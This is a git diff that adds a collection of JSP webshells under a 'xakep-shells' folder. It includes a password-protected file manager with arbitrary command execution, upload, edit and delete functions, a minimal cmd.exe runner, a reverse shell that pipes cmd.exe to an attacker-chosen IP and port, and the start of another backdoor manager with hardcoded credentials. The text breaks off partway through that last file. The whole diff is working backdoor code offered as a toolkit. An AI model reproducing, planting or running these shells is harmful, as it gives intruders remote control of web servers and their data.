\ No newline at end of file
diff --git a/xakep-shells/JSP/JspWebshell 1.2.jsp.txt b/xakep-shells/JSP/JspWebshell 1.2.jsp.txt
new file mode 100644
index 0000000..4ce0fcf
--- /dev/null
+++ b/xakep-shells/JSP/JspWebshell 1.2.jsp.txt	
@@ -0,0 +1,788 @@
+<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
+<%
+/**
+ * <p>Title:JspWebshell </p>
+ *
+ * <p>Description: jsp��վ����</p>
+ *
+ * <p>Copyright:�������[B.C.T] Copyright (c) 2006</p>
+ *
+ * <p>Company: zero.cnbct.org</p>
+ *  PS:��������С�ܴ�����Ȥ��д��������������ϵQQ:48124012
+ * @version 1.2
+ */
+ String path="";
+ String selfName="";
+ boolean copyfinish=false;
+%>
+<%  selfName=request.getRequestURI();
+     // String editfile="";
+        String editfile=request.getParameter("editfile");
+		if (editfile!=null)
+		{editfile=new String(editfile.getBytes("ISO8859_1"));
+		}
+	  path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+%>
+<%!    
+    String _password ="111";//����
+	public String readAllFile(String filePathName) throws IOException 
+	{ 
+	FileReader fr = new FileReader(filePathName); 
+	int count = fr.read();
+	String res="";
+	while(count != -1) 
+	{ 
+	//System.out.print((char)count); 
+		res=res+(char)count;
+	count = fr.read(); 
+	if(count == 13) 
+	{ 
+	fr.skip(1); 
+	} 
+	} 
+	fr.close(); 
+	return res;
+	} 
+public void writeFile(String filePathName,String args) throws IOException 
+{ 
+FileWriter fw = new FileWriter(filePathName); 
+PrintWriter out=new PrintWriter(fw); 
+out.write(args); 
+out.println(); 
+out.flush(); 
+fw.close(); 
+out.close(); 
+} 
+public boolean createFile(String filePathName) throws IOException 
+{ 
+boolean result = false; 
+File file = new File(filePathName); 
+if(file.exists()) 
+{ 
+System.out.println("�ļ��Ѿ����ڣ�"); 
+} 
+else 
+{ 
+file.createNewFile(); 
+result = true; 
+System.out.println("�ļ��Ѿ�������"); 
+} 
+return result; 
+}
+public boolean createFolder(String fileFolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(fileFolderName); 
+if(file.exists()) 
+{ 
+//file.delete(); 
+System.out.println("Ŀ¼�Ѿ�����!"); 
+result = true; 
+} 
+else 
+{ 
+file.mkdir(); 
+System.out.println("Ŀ¼�Ѿ�����!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+}  
+
+public boolean DeleteFolder(String filefolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(filefolderName); 
+if(file.exists()) 
+{ 
+file.delete(); 
+System.out.println("Ŀ¼��ɾ��!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+} 
+public boolean validate(String password) {
+	if (password.equals(_password)) {
+		return true;
+	} else {
+		return false;
+	}
+}
+public String HTMLEncode(String str) {
+	str = str.replaceAll(" ", "&nbsp;");
+	str = str.replaceAll("<", "&lt;");
+	str = str.replaceAll(">", "&gt;");
+	str = str.replaceAll("\r\n", "<br>");
+	
+	return str;
+}
+    public String exeCmd(String cmd) {
+	Runtime runtime = Runtime.getRuntime();
+	Process proc = null;
+	String retStr = "";
+	InputStreamReader insReader = null;
+	char[] tmpBuffer = new char[1024];
+	int nRet = 0;
+	
+	try {
+		proc = runtime.exec(cmd);
+		insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
+		while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
+			retStr += new String(tmpBuffer, 0, nRet);
+		}
+		
+		insReader.close();
+		retStr = HTMLEncode(retStr);
+	} catch (Exception e) {
+		retStr = "<font color=\"red\">�������\"" + cmd + "\"";
+	} finally {
+		return retStr;
+	}
+	}
+	public boolean fileCopy(String srcPath, String dstPath) {
+	boolean bRet = true;
+	
+	try {
+		FileInputStream in = new FileInputStream(new File(srcPath));
+		FileOutputStream out = new FileOutputStream(new File(dstPath));
+		byte[] buffer = new byte[1024];
+		int nBytes;
+		
+
+		while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
+			out.write(buffer, 0, nBytes);
+		}
+		
+		in.close();
+		out.close();
+	} catch (IOException e) {
+		bRet = false;
+	}	
+	
+	return bRet;
+}
+class EnvServlet
+{
+	public long timeUse=0;
+	public Hashtable htParam=new Hashtable();
+	private Hashtable htShowMsg=new Hashtable();
+	public void setHashtable()
+	{
+		Properties me=System.getProperties();
+		Enumeration em=me.propertyNames();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=me.getProperty(strKey);
+			htParam.put(strKey,strValue);
+		}
+	}	
+	public void getHashtable(String strQuery)
+	{
+		Enumeration em=htParam.keys();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=new String();
+			if(strKey.indexOf(strQuery,0)>=0)
+			{
+				strValue=(String)htParam.get(strKey);
+				htShowMsg.put(strKey,strValue);
+			}
+		}
+	}
+	public String queryHashtable(String strKey)
+	{
+		strKey=(String)htParam.get(strKey);
+		return strKey;
+	}
+/*	public long test_int()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		while(i<3000000)i++;
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}
+	public long test_sqrt()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		double db=(double)new Random().nextInt(1000);
+		while(i<200000){db=Math.sqrt(db);i++;}
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}*/
+}
+%>
+<%
+	EnvServlet env=new EnvServlet();
+	env.setHashtable();
+	//String action=new String(" ");
+	//String act=new String("action");
+	//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
+%>
+
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>JspWebShell By �������</title>
+<style>
+body {
+	font-size: 12px;
+	font-family: "����";
+	background-color: #666666;
+}
+A {
+	COLOR: black; TEXT-DECORATION: none
+}
+A:hover {
+	COLOR: black; TEXT-DECORATION: underline; none: 
+}
+td {
+	font-size: 12px;
+	font-family: "����";
+	color: #000000;
+}
+
+input.textbox {
+	border: black solid 1;
+	font-size: 12px;
+	height: 18px;
+}
+
+input.button {
+	font-size: 12px;
+	font-family: "����";
+	border: black solid 1;
+}
+
+td.datarows {
+	font-size: 12px;
+	font-family: "����";
+	height: 25px;
+	color: #000000;
+}
+.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
+textarea {
+border: black solid 1;
+}
+.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
+.table1 {BORDER:gray 0px ridge;}
+.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
+.tr1 {BACKGROUND-color:gray }
+</style>
+<script language="JavaScript" type="text/JavaScript">
+<!--
+function MM_reloadPage(init) {  //reloads the window if Nav4 resized
+  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
+    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
+  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
+}
+MM_reloadPage(true);
+//-->
+</script>
+</head>
+<body bgcolor="#666666">
+<%
+//session.setMaxInactiveInterval(_sessionOutTime * 60);
+String password=request.getParameter("password");
+if (password == null && session.getAttribute("password") == null) {
+
+%>
+
+<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px"> 
+  <TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
+    <tr> 
+      <td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
+          <tr> 
+            <TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell 
+              version 1.2������¼ :::...</b></font></TD>
+            <TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By 
+              �������</FONT></TD>
+          </tr>
+          <form name="bctform" method="post">
+            <tr bgcolor="#999999"> 
+              <td height="30" colspan="2" align="center" class="td2"> 
+                <input name="password" type="password" class="textbox" id="Textbox" /> 
+                <input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" /> 
+              </td>
+            </tr>
+          </form>
+        </TABLE></td>
+    </tr>
+  </TABLE>
+</div>
+<%
+
+	} else {
+	
+	if (session.getAttribute("password") == null) {
+		
+		if (validate(password) == false) {
+			out.println("<div align=\"center\"><font color=\"red\"><li>�������</font></div>");
+			out.close();
+			return;
+		}
+		
+		session.setAttribute("password", password);
+	} else {
+		password = (String)session.getAttribute("password");
+	}
+%>
+	<%
+		File tmpFile = null;
+		String delfile="";
+		String delfile1="";
+		String editpath="";
+		delfile1=request.getParameter("delfile");
+		editpath=request.getParameter("filepath");
+		if (delfile1!=null)
+		{delfile=new String(delfile1.getBytes("ISO8859_1"));
+		}
+        if ( delfile1!= null) {
+        //  out.print(delfile);
+	    	tmpFile = new File(delfile);
+		if (! tmpFile.delete()) {
+			out.print( "<font color=\"red\">ɾ��ʧ��</font><br>\n");
+			}
+			}
+%>
+  <%String editfilecontent=null;
+       String editfilecontent1=request.getParameter("content");
+	   // out.println(editfilecontent1);
+		//String save=request.getParameter("save");
+	   if (editfilecontent1!=null)
+	   {editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
+          //   out.print(editfile);
+			//out.print(editfilecontent);
+            if (editfile!=null&editfilecontent!=null)
+			{try {writeFile(editfile,editfilecontent);}
+			 catch (Exception e) {out.print("д��ʧ��");}
+			 out.print("д��ɹ�");
+			}
+			%>
+<%request.setCharacterEncoding("GBK");%>
+<%//String editfile=request.getParameter("editfile");
+//out.print(editfile);
+if (request.getParameter("jsptz")!=null)
+{%>
+<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2"> 
+  <CENTER>
+  <table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+  <tr> 
+      <td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong>��������ز���</strong></font>      
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+          <tr bgcolor="#999999" height="22">
+		  <td width="130" bgcolor="#999999">&nbsp;��������</td>
+            <td height="22" colspan="3">&nbsp;<%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;����������ϵͳ</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%> 
+              <%=env.queryHashtable("sun.os.patch.level")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;����������ϵͳ����</td>
+            <td>&nbsp;<%=env.queryHashtable("os.arch")%></td>
+            <td>&nbsp;����������ϵͳģʽ</td>
+            <td>&nbsp;<%=env.queryHashtable("sun.arch.data.model")%>λ</td>
+          </tr>     
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;���������ڵ���</td>
+            <td>&nbsp;<%=env.queryHashtable("user.country")%></td>
+            <td>&nbsp;����������</td>
+            <td>&nbsp;<%=env.queryHashtable("user.language")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;������ʱ��</td>
+            <td>&nbsp;<%=env.queryHashtable("user.timezone")%></td>
+            <td>&nbsp;������ʱ��</td>
+            <td>&nbsp;<%=new java.util.Date()%> </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;��������������</td>
+            <td width="170">&nbsp;<%= getServletContext().getServerInfo() %></td>
+            <td width="130">&nbsp;�������˿�</td>
+            <td width="170">&nbsp;<%= request.getServerPort() %></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;��ǰ�û�</td>
+            <td height="22" colspan="3">&nbsp;<%=env.queryHashtable("user.name")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;�û�Ŀ¼</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("user.dir")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td align=left>&nbsp;���ļ�ʵ��·��</td>
+            <td height="8" colspan="3">&nbsp;<%=request.getRealPath(request.getServletPath())%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+    <table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+      <tr> 
+      <td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVA��ز���</strong></font> 
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu1'>
+		<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;����</td>
+            <td width="50%" height="22">&nbsp;Ӣ������</td>
+            <td width="20%" height="22">&nbsp;�汾</td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVA���л�������</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVA���л���˵��������</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.specification.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.specification.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVA���������</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVA�����˵��������</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.version")%></td>
+          </tr>
+		  <%
+		  	float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
+			float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
+			float fPercent=fFreeMemory/fTotalMemory*100;
+		  %>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVA�����ʣ���ڴ棺</td>
+            <td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fFreeMemory/1024/1024%>M 
+            </td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVA����������ڴ�</td>
+            <td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fTotalMemory/1024/1024%>M 
+            </td>
+          </tr>
+        </table>
+		  <table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;��������</td>
+            <td width="70%" height="22">&nbsp;����·��</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.class.path </td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>	
+            </td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.home</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.home")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.endorsed.dirs</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.endorsed.dirs")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.library.path</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%> 
+            </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.io.tmpdir</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.io.tmpdir")%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+  <div id="testspeed" align="center"> </div>
+</CENTER></div>
+
+<%}
+else{
+if (editfile!=null)//if edit
+{
+%>
+<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1"> 
+  <table width="99%" height="232" border="0">
+    <tr> 
+      <td height="226"><form name="form2" method="post" action="">
+          <p align="center"> ��ַ��
+            <input name="editfile" type="text" value="<%=editfile%>" size="50">
+          </p>
+          <p align="center"> 
+            <textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
+            <input type="submit" name="Submit2" value="����">
+          </p>
+        </form> </td>
+    </tr>
+  </table>
+  <p>&nbsp;</p></div>
+<%}
+else{%>
+
+<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
+  <tr bgcolor="#333333"> 
+    <td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell 
+      version 1.0</font><font color="#FFFFFF">(��վĿ¼:<%=config.getServletContext().getRealPath("/")%>)</font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td colspan="4"> <font color="#000000"> 
+      <%
+	  File[] fs = File.listRoots();
+	  for (int i = 0; i < fs.length; i++){
+	  %>
+      <a href="<%=selfName %>?path=<%=fs[i].getPath()%>\">���ش���(<%=fs[i].getPath()%>) 
+      </a> 
+      <%}%>
+      </font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td height="10" colspan="4"> <font color="#000000"> 
+      <form name="form1" method="post" action="">
+        <input type="text" name="command" class="button">
+        <input type="submit" name="Submit" value="CMD����ִ��" class="button">
+      </form>
+      </font> <p> 
+        <%
+		String cmd = "";
+		InputStream ins = null;
+		String result = "";		
+		if (request.getParameter("command") != null) {		
+			cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
+        <%=result == "" ? "&nbsp;" : result%> 
+        <%}%>
+       </td>
+  </tr>
+  <FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
+    <tr bgcolor="#999999"> 
+      <td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150"  SIZE="50" class="button"> 
+        <INPUT TYPE="SUBMIT" VALUE="�ϴ�" class="button"> </td>
+      <td colspan="2"><a href="?jsptz=true" target="_blank">JSP̽��</a> </td>
+    </tr>
+  </FORM>
+  <%     String fileexe="";
+             String dir="";
+             String deldir=""; 
+			 String scrfile="";
+			 String dstfile="";
+			  fileexe=request.getParameter("fileexe");
+		     dir=request.getParameter("dir");
+			 deldir=request.getParameter("deldir");
+		     scrfile=request.getParameter("scrfile");
+			 dstfile=request.getParameter("dstfile");
+		  if (fileexe!=null)
+			{
+			//out.print(path+fileexe);
+			createFile(path+fileexe); 
+			}
+		  if (dir!=null)
+			{
+			//out.print(path+dir);
+			createFolder(path+dir); 
+			}
+		  if (deldir!=null)
+			{
+			//out.print(deldir);
+		    DeleteFolder(deldir); 
+			}
+			if (scrfile!=null&dstfile!=null)
+			{
+			//out.print(scrfile);
+			//out.print(dstfile);
+			copyfinish=fileCopy(scrfile, dstfile) ;
+			}
+			%>
+  <tr bgcolor="#CCCCCC"> 
+    <td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
+        �ļ������� 
+        <input name="dir" type="text" size="10" class="button">
+        <input type="submit" name="Submit3" value="�½�Ŀ¼" class="button">
+      </form></td>
+    <td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
+        �ļ����� 
+        <input name="fileexe" type="text" size="8" class="button">
+        <input type="submit" name="Submit4" value="�½��ļ�" class="button">
+      </form></td>
+    <td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
+        �ļ�<input name="scrfile" type="text" size="15"class="button">
+        ���Ƶ�
+        <input name="dstfile" type="text" size="15" class="button">
+        <input type="submit" name="Submit5" value="����" class="button">
+      </form><font color="#FF0000"><%if(copyfinish==true) out.print("���Ƴɹ�");%></font></td>
+  </tr>
+  <%//�ϴ�
+             String tempfilename="";
+             String up=request.getParameter("up");
+			// String tempfilepath=request.getParameter("filepath");
+			// out.print(tempfilepath);
+			  if(up!=null)
+		  {
+	       tempfilename=(String)session.getId();
+          //String tempfilename=request.getParameter("file");
+          File f1=new File(tempfilepath,tempfilename);
+          int n;
+          try
+          {
+              InputStream in=request.getInputStream();
+              BufferedInputStream my_in=new BufferedInputStream(in);
+              FileOutputStream fout=new FileOutputStream(f1);
+              BufferedOutputStream my_out=new BufferedOutputStream(fout);
+              byte[] b=new byte[10000];
+              while((n=my_in.read(b))!=-1)
+              {
+                   my_out.write(b,0,n);
+              }
+              my_out.flush();
+              my_out.close();
+              fout.close();
+              my_in.close();
+              in.close();
+             // out.print("�ļ������ɹ�!<br>");
+          }
+          catch(IOException e)
+          {
+              out.print("�ļ�����ʧ��!");
+          }
+          
+          try
+          {   
+              RandomAccessFile random1=new RandomAccessFile(f1,"r");
+              random1.readLine();
+              String filename=random1.readLine();
+              byte[] b=filename.getBytes("ISO-8859-1");
+              filename=new String(b);
+              int pointer=filename.lastIndexOf('\\');
+              filename=filename.substring(pointer+1,filename.length()-1);
+              File f2=new File(tempfilepath,filename);
+              RandomAccessFile random2=new RandomAccessFile(f2,"rw");
+              random1.seek(0);
+              for(int i=1; i<=4; i++)
+              {
+                   String tempstr=random1.readLine();
+              }
+              long startPoint=random1.getFilePointer();
+              random1.seek(random1.length());
+              long mark=random1.getFilePointer();
+              int j=0;
+              long endPoint=0;
+              while((mark>=0)&&(j<=5))
+              {
+                   mark--;
+                   random1.seek(mark);
+                   n=random1.readByte();
+                   if(n=='\n')
+
+                   {
+                         j++;
+                         endPoint=random1.getFilePointer();
+                   }
+              }
+              long length=endPoint-startPoint+1;
+              int order=(int)(length/10000);
+              int left=(int)(length%10000);
+              byte[] c=new byte[10000];
+              random1.seek(startPoint);
+              for(int i=0; i<order; i++)
+              {
+                    random1.read(c);
+                    random2.write(c);
+              }
+              random1.read(c,0,left);
+              random2.write(c,0,left);
+              random1.close();
+              random2.close();
+              f1.delete();
+              out.print("�ļ��ϴ��ɹ�!");
+          }
+          catch(Exception e)
+          {
+              out.print("�ļ��ϴ�ʧ��!");
+          }
+
+		  }
+	
+  %>
+  <tr> 
+    <td width="196" height="48" valign="top" bgcolor="#999999"> 
+      <%  try {
+	//path=request.getParameter("path");
+		//if(path==null)
+		//path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isDirectory())
+		    {%>
+      <a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">ɾ��</a><br> 
+      <% }
+		
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("�����ڻ�û��Ȩ��");
+		}
+	%>
+      &nbsp; </td>
+    <td colspan="3" valign="top" bgcolor="#999999"> 
+      <%  try {
+	path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isFile())
+		    {//request.getContextPath()�õ�����·��%>
+     <%=fList[j].getName()%> 
+       <a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">�༭</a> 
+      &nbsp; <a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">ɾ��</a><br> 
+      <% }
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("�����ڻ�û��Ȩ��");
+		}
+	%>
+    </td>
+  </tr>
+</table>
+<p align="center">Power By �������[B.C.T] QQ:48124012</p>
+<p align="center">&nbsp;</p>
+<%}//if edit
+}
+}
+%>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/JSP/cmdjsp.jsp.txt b/xakep-shells/JSP/cmdjsp.jsp.txt
new file mode 100644
index 0000000..63625af
--- /dev/null
+++ b/xakep-shells/JSP/cmdjsp.jsp.txt
@@ -0,0 +1,32 @@
+// note that linux = cmd and windows = "cmd.exe /c + cmd" 
+
+<FORM METHOD=GET ACTION='cmdjsp.jsp'>
+<INPUT name='cmd' type=text>
+<INPUT type=submit value='Run'>
+</FORM>
+
+<%@ page import="java.io.*" %>
+<%
+   String cmd = request.getParameter("cmd");
+   String output = "";
+
+   if(cmd != null) {
+      String s = null;
+      try {
+         Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
+         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
+         while((s = sI.readLine()) != null) {
+            output += s;
+         }
+      }
+      catch(IOException e) {
+         e.printStackTrace();
+      }
+   }
+%>
+
+<pre>
+<%=output %>
+</pre>
+
+<!--    http://michaeldaw.org   2006    -->
diff --git a/xakep-shells/JSP/jsp-reverse.jsp.txt b/xakep-shells/JSP/jsp-reverse.jsp.txt
new file mode 100644
index 0000000..ae9a781
--- /dev/null
+++ b/xakep-shells/JSP/jsp-reverse.jsp.txt
@@ -0,0 +1,91 @@
+// backdoor.jsp
+// http://www.security.org.sg/code/jspreverse.html
+
+<%@
+page import="java.lang.*, java.util.*, java.io.*, java.net.*"
+% >
+<%!
+static class StreamConnector extends Thread
+{
+        InputStream is;
+        OutputStream os;
+
+        StreamConnector(InputStream is, OutputStream os)
+        {
+                this.is = is;
+                this.os = os;
+        }
+
+        public void run()
+        {
+                BufferedReader isr = null;
+                BufferedWriter osw = null;
+
+                try
+                {
+                        isr = new BufferedReader(new InputStreamReader(is));
+                        osw = new BufferedWriter(new OutputStreamWriter(os));
+
+                        char buffer[] = new char[8192];
+                        int lenRead;
+
+                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
+                        {
+                                osw.write(buffer, 0, lenRead);
+                                osw.flush();
+                        }
+                }
+                catch (Exception ioe)
+
+                try
+                {
+                        if(isr != null) isr.close();
+                        if(osw != null) osw.close();
+                }
+                catch (Exception ioe)
+        }
+}
+%>
+
+<h1>JSP Backdoor Reverse Shell</h1>
+
+<form method="post">
+IP Address
+<input type="text" name="ipaddress" size=30>
+Port
+<input type="text" name="port" size=10>
+<input type="submit" name="Connect" value="Connect">
+</form>
+<p>
+<hr>
+
+<%
+String ipAddress = request.getParameter("ipaddress");
+String ipPort = request.getParameter("port");
+
+if(ipAddress != null && ipPort != null)
+{
+        Socket sock = null;
+        try
+        {
+                sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
+
+                Runtime rt = Runtime.getRuntime();
+                Process proc = rt.exec("cmd.exe");
+
+                StreamConnector outputConnector =
+                        new StreamConnector(proc.getInputStream(),
+                                          sock.getOutputStream());
+
+                StreamConnector inputConnector =
+                        new StreamConnector(sock.getInputStream(),
+                                          proc.getOutputStream());
+
+                outputConnector.start();
+                inputConnector.start();
+        }
+        catch(Exception e) 
+}
+%>
+
+<!--    http://michaeldaw.org   2006    -->
diff --git a/xakep-shells/JSP/jspshall.jsp.txt b/xakep-shells/JSP/jspshall.jsp.txt
new file mode 100644
index 0000000..41c608e
--- /dev/null
+++ b/xakep-shells/JSP/jspshall.jsp.txt
@@ -0,0 +1,862 @@
+<%@page import="java.util.*,java.io.*,java.sql.*,java.util.zip.*,java.lang.reflect.*,java.net.*,javax.servlet.jsp.*"%>
+<%@page contentType="text/html;charset=GBK"%>
+<%@page pageEncoding="gb2312"%>
+<%!
+final String APP_NAME="KJ021320 JSP Manage-System 1.0";
+int portListen=5000;//set the httpproxy port
+boolean openHttpProxy=false;//set the httpproxy load-on-start-up
+%>
+<%
+    session.setMaxInactiveInterval(6000);
+    final String WEB_SITE=folderReplace(application.getRealPath("/"));
+    final String URL=request.getRequestURI();
+    if(session.getAttribute("ID")==null){
+        // the user and pass  field  
+        String username="kj021320";
+        String password="kj021320";
+        // the user and pass  field  
+        if(request.getParameter("LName")!=null&&request.getParameter("LPass")!=null&&request.getParameter("LName").equals(username)&&request.getParameter("LPass").equals(password)){
+            session.setAttribute("ID","1");
+            response.sendRedirect(URL);
+        }else{
+            out.println("<center style=font-size:12px><br><br>"+APP_NAME+"<br><br>" +
+                       "<form name=login method=post>username:<input name=LName type=text size=15><br>" +
